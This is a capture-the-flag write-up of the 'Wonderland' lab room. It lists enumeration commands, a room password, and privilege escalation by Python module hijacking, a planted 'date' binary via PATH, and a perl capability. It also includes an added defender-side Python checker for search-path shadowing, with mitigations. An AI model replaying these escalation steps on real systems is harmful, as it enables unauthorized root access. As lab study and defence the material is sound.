Wonderland
>sudo nmap -sT -sC -A -Pn -T4 10.10.125.79
Port 22 and 80 open
Started gobuster and browsed the site
>gobuster dir -w /dirbuster/2.3.3-medium -u 10.10.125.79
The webpage is just some text and a jpg. Nothing in source code or robots.txt
gobuster found a /r/ directory
Browsing to it reveals another page that hints we are on the right track
Ran gobuster on this new directory
>gobuster dir -w /dirbuster/2.3.3-medium -u 10.10.125.79/r
Found a /a directory
Guessed that it might spell rabbit, and it did
10.10.125.79/r/a/b/b/i/t
Browsing to this page revealed more text and a jpg. Looking through the source code revealed a hidden username and password
Used these creds to log in through SSH. Got a shell. Nice
alice:HowDothTheLittleCrocodileImproveHisShiningTail
In the directory we land in, /home/alice, we find a python file.
Catting out this file reveals that it is a random poem generator. It imports the random library (random.py).
sudo -l shows that we can run this python file as the user rabbit using sudo
>python3 -c 'import sys; print (sys.path)'
Running this command shows that our current directory is searched before the Python library directory, so a module of the same name placed there is imported first
If we create a random.py file which loads a python shell, we can escalate to rabbit.
>nano random.py
>sudo -u rabbit /usr/bin/python3.6 /home/alice/walrusandthe_carpenter.py
Now we are rabbit. Moving to hatter's home directory shows an executable called teaParty
Here I had to look at a walkthrough to understand wtf to do. However, moving this program to our machine and running strings on it shows that it runs two commands during execution: echo and date.
We can make a malicious bash file called date in the /tmp directory since it is world writable, make it executable, and prepend /tmp to PATH. This has the effect of calling our date file before the real date and escalates us.
>cd /tmp
>nano date
>chmod +x date
>export PATH=/tmp:$PATH
>cd /home/rabbit
>./teaParty
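Both escalations above rely on the same mechanism: a search path (Python's sys.path, whose first entry for `python3 script.py` is the script's own directory, and the shell's $PATH for a command named without a full path) is walked in order, and the first matching file wins. The following is an added defender-side check, not part of the original writeup and not code from the room: it models that resolution and flags any directory ahead of the trusted one that other users can write to. The directory layout, file names and permission bits are constructed in a temporary directory; nothing is read from the real box.

```python
import os
import stat
import tempfile

# Generic search-path resolver: both the Python import system (sys.path) and the
# shell's command lookup ($PATH) take the FIRST directory that holds a matching file.
def first_hit(name, search_dirs):
    """Return the directory from search_dirs that would satisfy `name`, or None."""
    for d in search_dirs:
        if os.path.isfile(os.path.join(d, name)):
            return d
    return None

def is_writable_by_others(path):
    """True if the directory is group- or world-writable (a coarse check, but it
    catches /tmp and loosely permissioned home directories)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWOTH | stat.S_IWGRP))

def shadowing_risk(name, search_dirs, trusted_dir):
    """Report whether `name` resolves somewhere other than `trusted_dir`, and which
    directories searched before it could be populated by an unprivileged user."""
    hit = first_hit(name, search_dirs)
    writable_ahead = []
    for d in search_dirs:
        if os.path.normpath(d) == os.path.normpath(trusted_dir):
            break
        if os.path.isdir(d) and is_writable_by_others(d):
            writable_ahead.append(d)
    shadowed = hit is not None and os.path.normpath(hit) != os.path.normpath(trusted_dir)
    return {"name": name, "resolves_to": hit, "trusted": trusted_dir,
            "shadowed": shadowed, "writable_ahead": writable_ahead}

def python_search_order(script_path, base_sys_path, isolated=False):
    """Model sys.path for `python3 script.py`: the script's own directory is
    inserted at index 0 unless the interpreter runs in isolated mode (python3 -I;
    on 3.11+ the -P flag or PYTHONSAFEPATH=1 removes just that entry)."""
    if isolated:
        return list(base_sys_path)
    return [os.path.dirname(os.path.abspath(script_path))] + list(base_sys_path)

def demo():
    """Constructed layout (hypothetical, not the room's filesystem): a group-writable
    home dir with a stand-in random.py, a 'stdlib' dir with the trusted one, and a
    world-writable /tmp stand-in holding a file named date ahead of a trusted bin."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home", "alice")
    lib = os.path.join(root, "usr", "lib", "python3.6")
    tmp = os.path.join(root, "tmp")
    binp = os.path.join(root, "bin")
    for d in (home, lib, tmp, binp):
        os.makedirs(d)
    os.chmod(tmp, 0o1777)   # sticky and world-writable, like a real /tmp
    os.chmod(home, 0o775)   # group-writable home: the constructed weakness
    for d, f in ((home, "random.py"), (lib, "random.py"), (tmp, "date"), (binp, "date")):
        with open(os.path.join(d, f), "w") as fh:
            fh.write("# placeholder file; contents are irrelevant to the resolver\n")
    script = os.path.join(home, "walrusandthe_carpenter.py")
    open(script, "w").close()

    import_report = shadowing_risk("random.py", python_search_order(script, [lib]), lib)
    isolated_report = shadowing_risk("random.py", python_search_order(script, [lib], isolated=True), lib)
    path_report = shadowing_risk("date", [tmp, binp], binp)
    return import_report, isolated_report, path_report

if __name__ == "__main__":
    for report in demo():
        print(report)
```

Running it prints three reports: the random.py import resolving into the writable home directory ahead of the library directory, the same lookup with the script directory removed (what `python3 -I` does), and the date lookup resolving into the /tmp stand-in. The mitigations follow directly from what the check measures: run sudo-exposed scripts with the script directory out of sys.path, keep their directory owned by and writable only by the privileged user, and in any setuid or sudo-run binary invoke helper programs by absolute path rather than trusting the caller's PATH.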
Now we are hatter. Changing to /home/hatter shows a password.txt file
Catting it out shows a password. This is important later, but we SSH in as hatter with this password to get a stable uid and gid for hatter
>ssh hatter@10.10.125.79
(enter hatter's password at the prompt)
Moving to /tmp, I fetched linpeas with wget and ran it. It showed a setuid capability on perl. Straight to GTFOBins, and we find that a binary with that capability can be used to escalate us.
Boom, root. Cool. That room is neat and gives me more ideas about privilege escalation in the future. A lot more